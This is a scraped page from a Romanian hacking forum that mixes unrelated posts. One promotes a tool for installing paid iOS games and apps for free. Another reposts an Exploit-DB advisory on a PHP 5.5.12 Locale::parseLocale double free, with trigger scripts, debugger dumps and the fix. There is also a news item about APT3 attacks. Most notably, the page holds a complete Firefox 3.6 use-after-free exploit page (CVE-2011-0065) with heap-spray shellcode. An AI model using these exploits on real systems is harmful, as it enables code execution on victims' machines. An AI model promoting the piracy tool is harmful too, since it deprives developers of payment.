Leaderboard

Salut cautam de ceva vreme cum as putea sa-mi instalez ceva jocuri care sunt cu plata pe App Store si am gasit acest tutorial pe youtube(NU NECESITA JAILBREAK) : Click Me ! Link-ul programului este acesta : Click ! Daca urmati tutorialul de pe youtube este foarte simplu , chiar nu ma asteptam practic acest program gaseste si cele mai noi jocuri de pe app store si le downloadeaza & instaleaza (nu-mi dau seama cum functioneaza acest program , daca stie cineva sa explice) Se intampla dupa ce sa downloadat jocurile si instalat sa vreti sa intrati in unul si sa primiti black screen apoi inapoi la home screen , aceasta eroare se poate rezolva prin tutorialul asta PS : Ma astept la comentarii de genul "developeri muncesc sa faca si ei un ban si .. . da, dar de ce as da bani pe niste jocuri pentru telefon cand as putea sa-mi cumpar un suc si un pachet de tigari de bani aia? (Mentalitate de roman) , din cate am vazut jocurile ruleaza corect ba chiar apar in game center si in App store ca downloadate si merg exact ca si cum le-ai fi cumparat Am postat aici pentru ca : "Stuff tools Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate. Doar programe sau scripturi." Daca am gresit sectiunea rog mutarea topic-ul-ui , multumesc si spor. Jocurile mele recent downloadate pe un 5s cu ios 8.1: Toate jocurile inafara de RNF4 si Fightback costa cate ceva pe AppStore iar eu le-am downloadat gratuit folosind acest program. Edit : Am uitat sa mentionez ca merge si la aplicatii cu plata. Edit 2 : http://www.youtube.com/watch?v=4-jm2A1vb14 Aici aveti tutorial video cu PP. (Selectati calitate hd 720p pentru o vizionare buna.

+1

PHP 5.5.12 Locale::parseLocale Memory Corruption Full Package: http://www.exploit-db.com/sploits/35358.tgz Description: ------------ PHP 5.5.12 suffers from a memory corruption vulnerability that could potentially be exploited to achieve remote code execution. The vulnerability exists due to inconsistent behavior in the get_icu_value_internal function of ext\intl\locale\locale_methods.c. In most cases, get_icu_value_internal allocates memory that the caller is expected to free. However, if the first argument, loc_name, satisfies the conditions specified by the isIDPrefix macro (figure 1), and fromParseLocal is true, loc_name itself is returned. If a caller abides by contract and frees the return value of such a call, then the pointer passed via loc_name is freed again elsewhere, a double free occurs. Figure 1. Macros used by get_icu_value_internal. #define isIDSeparator(a) (a == '_' || a == '-') [...] #define isPrefixLetter(a) ((a=='x')||(a=='X')||(a=='i')||(a=='I')) [...] #define isIDPrefix(s) (isPrefixLetter(s[0])&&isIDSeparator(s[1])) The zif_locale_parse function, which is exported to PHP as Locale::parseLocale, makes a call to get_icu_value_internal with potentially untrusted data. By passing a specially crafted locale (figure 2), remote code execution may be possible. The exploitability of this vulnerability is dependent on the attack surface of a given application. In instances where the locale string is exposed as a user configuration setting, it may be possible to achieve either pre- or post-authentication remote code execution. In other scenarios this vulnerability may serve as a means to achieve privilege escalation. Figure 2. A call to Locale::parseLocale that triggers the exploitable condition. Locale::parseLocale("x-AAAAAA"); Details for the two frees are shown in figures 3 and 4. Figure 3. The first free. 0:000> kP ChildEBP RetAddr 016af25c 7146d7a3 php5ts!_efree( void * ptr = 0x030bf1e0)+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440] 016af290 7146f6a2 php_intl!add_array_entry( char * loc_name = 0x0179028c "", struct _zval_struct * hash_arr = 0x00000018, char * key_name = 0x71489e60 "language", void *** tsrm_ls = 0x7146f6a2)+0x1d3 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1073] 016af2b0 0f0c15ab php_intl!zif_locale_parse( int ht = 0n1, struct _zval_struct * return_value = 0x030bf4c8, struct _zval_struct ** return_value_ptr = 0x00000000, struct _zval_struct * this_ptr = 0x00000000, int return_value_used = 0n1, void *** tsrm_ls = 0x0178be38)+0xb2 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1115] 016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC( struct _zend_execute_data * execute_data = 0x0179028c, void *** tsrm_ls = 0x00000018)+0x1cb [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 551] 016af358 0f114757 php5ts!execute_ex( struct _zend_execute_data * execute_data = 0x030bef20, void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363] 016af380 0f0e60ea php5ts!zend_execute( struct _zend_op_array * op_array = 0x030be5f0, void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388] 016af3b4 0f0e4a00 php5ts!zend_execute_scripts( int type = 0n8, void *** tsrm_ls = 0x00000001, struct _zval_struct ** retval = 0x00000000, int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317] 016af5c0 00cc21fb php5ts!php_execute_script( struct _zend_file_handle * primary_file = <Memory access error>, void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506] 016af844 00cc2ed1 php!do_cli( int argc = 0n24707724, char ** argv = 0x00000018, void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995] 016af8e0 00cca05e php!main( int argc = 0n2, char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378] 016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536] 016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe 016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20 016af980 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> ub eip php5ts!_efree+0x49 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]: 0f0b1ef9 732e jae php5ts!_efree+0x79 (0f0b1f29) 0f0b1efb 817e4c00000200 cmp dword ptr [esi+4Ch],20000h 0f0b1f02 7325 jae php5ts!_efree+0x79 (0f0b1f29) 0f0b1f04 8bc2 mov eax,edx 0f0b1f06 c1e803 shr eax,3 0f0b1f09 8d0c86 lea ecx,[esi+eax*4] 0f0b1f0c 8b4148 mov eax,dword ptr [ecx+48h] 0f0b1f0f 894708 mov dword ptr [edi+8],eax 0:000> u eip php5ts!_efree+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]: 0f0b1f12 897948 mov dword ptr [ecx+48h],edi 0f0b1f15 01564c add dword ptr [esi+4Ch],edx 0f0b1f18 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)] 0f0b1f1d 85c0 test eax,eax 0f0b1f1f 0f851d040000 jne php5ts!_efree+0x492 (0f0b2342) 0f0b1f25 5f pop edi 0f0b1f26 5e pop esi 0f0b1f27 59 pop ecx 0:000> ?edi+8 Evaluate expression: 51114464 = 030bf1e0 0:000> dc edi+8 030bf1e0 00000000 41414141 00000000 00000000 ....AAAA........ 030bf1f0 00000011 00000019 61636f6c 0300656c ........locale.. 030bf200 00000011 00000011 6e697270 00725f74 ........print_r. 030bf210 00000109 00000011 030bf320 030bf210 ........ ....... 030bf220 01790494 00000000 00000000 00000000 ..y............. 030bf230 00000000 00000000 00000000 00000000 ................ 030bf240 00000000 00000000 00000000 00000000 ................ 030bf250 00000000 00000000 00000000 00000000 ................ Figure 4. The second free. 0:000> kP ChildEBP RetAddr 016af2c4 0f0c1813 php5ts!_zval_dtor_func( struct _zval_struct * zvalue = 0x030bf3f8)+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36] 016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC( struct _zend_execute_data * execute_data = 0x0179028c, void *** tsrm_ls = 0x00000018)+0x433 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 642] 016af358 0f114757 php5ts!execute_ex( struct _zend_execute_data * execute_data = 0x030bef20, void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363] 016af380 0f0e60ea php5ts!zend_execute( struct _zend_op_array * op_array = 0x030be5f0, void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388] 016af3b4 0f0e4a00 php5ts!zend_execute_scripts( int type = 0n8, void *** tsrm_ls = 0x00000001, struct _zval_struct ** retval = 0x00000000, int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317] 016af5c0 00cc21fb php5ts!php_execute_script( struct _zend_file_handle * primary_file = <Memory access error>, void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506] 016af844 00cc2ed1 php!do_cli( int argc = 0n24707724, char ** argv = 0x00000018, void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995] 016af8e0 00cca05e php!main( int argc = 0n2, char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378] 016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536] 016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe 016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20 016af980 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> ub eip php5ts!_zval_dtor_func+0x5e [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]: 0f0b1cae 0f8394000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48) 0f0b1cb4 817f4c00000200 cmp dword ptr [edi+4Ch],20000h 0f0b1cbb 0f8387000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48) 0f0b1cc1 8bc2 mov eax,edx 0f0b1cc3 c1e803 shr eax,3 0f0b1cc6 8d0c87 lea ecx,[edi+eax*4] 0f0b1cc9 8b4148 mov eax,dword ptr [ecx+48h] 0f0b1ccc 894608 mov dword ptr [esi+8],eax 0:000> u eip php5ts!_zval_dtor_func+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]: 0f0b1ccf 897148 mov dword ptr [ecx+48h],esi 0f0b1cd2 01574c add dword ptr [edi+4Ch],edx 0f0b1cd5 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)] 0f0b1cda 85c0 test eax,eax 0f0b1cdc 0f8591010000 jne php5ts!_zval_dtor_func+0x223 (0f0b1e73) 0f0b1ce2 5f pop edi 0f0b1ce3 5e pop esi 0f0b1ce4 c3 ret 0:000> ?esi+8 Evaluate expression: 51114464 = 030bf1e0 0:000> dc esi+8 030bf1e0 030bf1d8 41414141 00000000 00000000 ....AAAA........ 030bf1f0 00000011 00000019 61636f6c 0300656c ........locale.. 030bf200 00000011 00000011 6e697270 00725f74 ........print_r. 030bf210 00000109 00000011 030bf320 030bf210 ........ ....... 030bf220 01790494 00000000 00000000 00000000 ..y............. 030bf230 00000000 00000000 00000000 00000000 ................ 030bf240 00000000 00000000 00000000 00000000 ................ 030bf250 00000000 00000000 00000000 00000000 ................ The outcome of the double free depends on the arrangement of the heap. A simple script that produces a variety of read access violations is shown in figure 5, and another that reliably produces data execution prevention access violations is provided in figure 6. Figure 5. A script that produces a variety of AVs. <?php Locale::parseLocale("x-AAAAAA"); $foo = new SplTempFileObject(); ?> Figure 6. A script that reliably produces DEPAVs. <?php Locale::parseLocale("x-7-644T-42-1Q-7346A896-656s-75nKaOG"); $pe = new SQLite3($pe, new PDOException(($pe->{new ReflectionParameter(TRUE, new RecursiveTreeIterator((null > ($pe+=new RecursiveCallbackFilterIterator((object)$G16 = new Directory(), DatePeriod::__set_state()))), (array)$h453 = new ReflectionMethod(($pe[TRUE]), $G16->rewind((array)"mymqaodaokubaf")), ($h453->getShortName() === null), ($I68TB = new InvalidArgumentException($H03 = new DOMStringList(), null, (string)MessageFormatter::create($sC = new AppendIterator(), new DOMUserDataHandler())) & null)))}), ($h453[(bool)DateInterval::__set_state()]), new PDOStatement()), TRUE); $H03->item((unset)$gn = new SplStack()); $sC->valid(); ?> To fix the vulnerability, get_icu_value_internal should be modified to return a copy of loc_name rather than loc_name itself. This can be done easily using the estrdup function. The single line fix is shown in figures 7 and 8. Figure 7. The original code. if( strcmp(tag_name , LOC_LANG_TAG)==0 ){ if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){ return (char *)loc_name; } } Figure 8. The fixed code. if( strcmp(tag_name , LOC_LANG_TAG)==0 ){ if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){ return estrdup(loc_name); } } Sursa: http://www.exploit-db.com/exploits/35358/

APT3, a group believed to be behind “Operation Clandestine Fox” is now using exploits targeting recently disclosed vulnerabilities in Windows, researchers at FireEye found. One of the bugs, CVE-2014-6332, was fixed this Patch Tuesday and noted for being remotely exploitable for 18 years prior to the update. The Windows OLE Automation Array Remote Code Execution vulnerability presented a serious security issue to users, researchers warned, as it impacts every version of Microsoft Windows since Windows 95. At the time, IBM X-Force Research manager Robert Freeman said that remote exploitation became possible with the release of Internet Explorer 3.0 in 1996, since Visual Basic Script (VBScript) was introduced. In an interview with SCMagazine.com, Freeman explained that exploitation of the bug would be a “tricky” feat, but also “very formulaic” to recreate once saboteurs came up with attack scenarios. Now, attacks exploiting the bug have appeared to come to fruition, as security firm FireEye detailed in a Friday blog post. According to the company, the Windows OLE bug, and a separate Windows privilege escalation vulnerability, CVE-2014-4113, have been targeted by the threat group called APT3. Both bugs received a patch from Microsoft (4113 in October's Patch Tuesday and 6332 in this month's update), a sign that APT3 has apparently moved from leveraging zero-day exploits, to targeting victims with “known exploits or social engineering,” FireEye said. In the Clandestine Fox campaign APT3 carried, the group was initially observed exploiting an Internet Explorer zero-day to deliver malware to users. Then the group switched up its tactics, wooing new victims via social engineering – in one instance, targeting an energy company by posing as a job applicant seeking employment. The supposed applicant contacted an employee on a popular social networking site, and weeks later emailed a resume to the employee's personal email account, which contained a weaponized file designed to drop a backdoor called “Cookie Cutter.” In the most recent wave of phishing lures beginning last Wednesday, dubbed “Operation Double Tap,” attackers sent malicious emails claiming to offer a free month's membership to a Playboy website, FireEye warned. On Oct. 28, APT3 was again observed sending spearphishing emails, which ultimately installed backdoor Cookie Cutter on vulnerable users' machines. FireEye published indicators of compromise (IOCs) in its post. In a Monday interview with SCMagazine.com, John Kuhn, senior threat researcher at IBM X-Force, said that his company had detected separate attacks targeting the Windows OLE bug. On Monday, Trey Ford, global security strategist at Rapid7, told SCMagazine.com in email correspondence that the exploitation of Windows OLE in the wild demonstrates why there needs to be “several paths forward in a vulnerability disclosure line of conversation.” Source

<!-- Exploit Author: Juan Sacco Name: Mozilla Firefox 3.6 mChannel ( Universal ) Description: Mozilla Firefox 3.6 is prone to an use-after-free vulnerability in OBJECT mChannel that allows an attacker to execute arbitrary code. Tested on Windows XP SP3 CVE: 2011-0065 --> <html> <head> </head> <body> <pre> # Title: Firefox 3.6 ( Universal ) </pre> <object id="exploit" ></object> <script> function exploit() { var foo=document.getElementById("exploit"); e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0); var vftable = unescape("\x00% u0c10"); var shellcode = unescape("%u0004%u0c10%uBCBB%u68F1%u0105%u0106%uBE51%u6623%u0030%u0c10%u7C2A%u68F0%u5B33%u661C%u0030%u0c10%uF1DD%u68F2%u0030%u0c10%u9000%u0000%u0040%u0000%u0c0c%u0c0c%u0038%u0c10%u9090%u9090%u9090%u9090%uC781%u986D%u0007%u078B%uF505%u03F6%u9000%u9090%u056A%uC181%u008E%u0000%u9051%uF08B%uD0FF%ucccc%uEE81%u95Fa%u0004%uFF6A%uD6FF%uCCCC%u6163%u636c%u652e%u6578%u0000%ucccc"); var vtable = unescape("%u0c0c%u0c0c"); while(vtable.length < 0x10000) {vtable += vtable;} var heapblock = shellcode+vtable.substring(0,0x10000/2-shellcode.length*2); while (heapblock.length<0x80000) {heapblock += shellcode+heapblock;} var finalspray = heapblock.substring(0,0x80000 - shellcode.length - 0x24/2 - 0x4/2 - 0x2/2); var heapspray = new Array() for (var i=0;i<0x100;i++){ heapspray[i] = finalspray+shellcode; } foo.data="";} </script> <input type=button value="Exploit" onclick="exploit()" /> </body> </html> Source

Bine oamenilor.. a fost doar o sugestie, nu ma omorati.... Nu am spus ca vrem avantaje.... am spus "mici avantaje" sa incurajeze lumea sa sustina RST .. mi se pare corect ca un site de pe care profita toata lumea (inclusiv eu ca am primit ajutor) sa primeasca un ajutor .. cat de mic... daca tu te superi ca primesti 5 euro degeaba imi cer scuze cu saracia mea PS: sunt multe siteuri care accepta donatii.. oricat de mici si la care am donat... nu inteleg de ce se apuca lumea de cur si sare in sus din nimic ??... da de... awsa e romanu.. deaia sungem saraci ca nu ne intelegem intre noi si e fiecare cu mamaliga lui

Nu inchide nimeni cacatu' asta? @Ganav

Am trolat pe cineva si am zis sa vi le dau si voua,se fac imagini frumoase cu ele ( eu sunt 0 in photoshop ) Demo aleatorii : 1 , 2 , 3 base64:cnN0